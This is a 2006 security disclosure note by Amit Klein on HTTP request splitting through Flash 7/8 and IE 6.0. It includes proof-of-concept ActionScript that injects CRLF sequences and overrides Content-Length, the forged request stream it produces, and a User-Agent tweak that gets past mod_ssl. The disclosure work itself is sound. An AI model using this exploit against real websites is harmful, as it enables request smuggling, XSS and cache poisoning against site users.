Technical note by Amit Klein: "Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)"
Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)
Amit Klein, August 2006
The trick
=========
In [1], I showed how to forge parts of HTTP requests containing
CRs and LFs using Flash. In that write-up, the data was part of the
HTTP body section. However, combining the Content-Length overriding
trick from [2] enables a condition of HTTP request splitting (see [3]).
This enables almost complete control over the second HTTP request -
including methods. The only pre-requisite (apart from using IE 6.0 and
Flash 7/8) is that there's one resource in the target website that does
not terminate the TCP connection in response to a POST request.
Here's an example:
var req:XML=new XML("<foo>\r\nOPTIONS / HTTP/1.0\r\nHost:
www.target.site\r\n\r\n</foo>");
req.addRequestHeader("Content-Length","7");
req.send("http://www.target.site/path/to/script.cgi","_blank";);
The request stream is:
POST /path/to/script.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.target.site
Connection: Keep-Alive
Cache-Control: no-cache
<foo>
OPTIONS / HTTP/1.0
Host: www.target.site
</foo>
Note that this works well in HTTP and HTTPS.
Also note that if the target web server is Apache 2.0 with mod_ssl,
then there's a need to modify the User-Agent header for IE, in order
for it not to include the string "MSIE". If the string "MSIE" is
found in the User-Agent header, mod_ssl will terminate the HTTPS
connection after the first request (see [5]). So this is as simple
as adding the following to the ActionScript code:
req.addRequestHeader("User-Agent","Hacker/1.0");
Some interesting consequences
=============================
- Javascript scanning - now can use almost all HTTP methods (verbs)
including WebDAV, full control over the headers, etc.
- All the impact in [3] and [4] is relevant - XSS in some cases, HTTP
request smugling and HTTP Response Splitting attacks (from the
browser), etc.
References
==========
[1] "Sending multipart/form-data requests from Flash (with arbitrary
headers)", Amit Klein, August 2006
http://www.securityfocus.com/archive/1/442820
[2] "Forging HTTP request headers with Flash", Amit Klein, July 2006
http://www.securityfocus.com/archive/1/441014
[3] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing,
and a lot more...", Amit Klein, September 2005
http://www.securityfocus.com/archive/1/411585
[4] "IE + some popular forward proxy servers = XSS, defacement (browser
cache poisoning)", Amit Klein, May 2006
http://www.securityfocus.com/archive/1/434931
[5] "mod_ssl F.A.Q." (mod_ssl website), under "When I connect via HTTPS
to an Apache+mod_ssl+OpenSSL server with Microsoft Internet Explorer
(MSIE) I get various I/O errors. What is the reason?"
http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49